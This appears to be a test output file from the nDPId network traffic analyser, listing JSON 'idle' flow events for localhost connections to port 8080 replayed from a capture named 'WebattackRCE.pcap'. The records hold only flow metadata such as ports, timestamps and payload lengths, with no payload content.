00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277434,"flow_last_seen":1576420277434,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50510,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277436,"flow_last_seen":1576420277436,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50512,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":476,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277437,"flow_last_seen":1576420277437,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50514,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":477,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277438,"flow_last_seen":1576420277438,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50516,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":478,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277439,"flow_last_seen":1576420277439,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50518,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277442,"flow_last_seen":1576420277442,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50520,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277443,"flow_last_seen":1576420277443,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50522,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277444,"flow_last_seen":1576420277444,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50524,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277446,"flow_last_seen":1576420277446,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50526,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277448,"flow_last_seen":1576420277448,"flow_idle_time":7580000,"flow_min_l4_payload_len":211,"flow_max_l4_payload_len":211,"flow_tot_l4_payload_len":211,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50528,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277449,"flow_last_seen":1576420277449,"flow_idle_time":7580000,"flow_min_l4_payload_len":215,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50530,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277451,"flow_last_seen":1576420277451,"flow_idle_time":7580000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50532,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277452,"flow_last_seen":1576420277452,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50534,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277454,"flow_last_seen":1576420277454,"flow_idle_time":7580000,"flow_min_l4_payload_len":213,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50536,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277455,"flow_last_seen":1576420277455,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50538,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277458,"flow_last_seen":1576420277458,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50540,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277473,"flow_last_seen":1576420277473,"flow_idle_time":7580000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277474,"flow_last_seen":1576420277474,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277477,"flow_last_seen":1576420277477,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277478,"flow_last_seen":1576420277478,"flow_idle_time":7580000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277480,"flow_last_seen":1576420277480,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277488,"flow_last_seen":1576420277488,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277490,"flow_last_seen":1576420277490,"flow_idle_time":7580000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277491,"flow_last_seen":1576420277491,"flow_idle_time":7580000,"flow_min_l4_payload_len":161,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":161,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
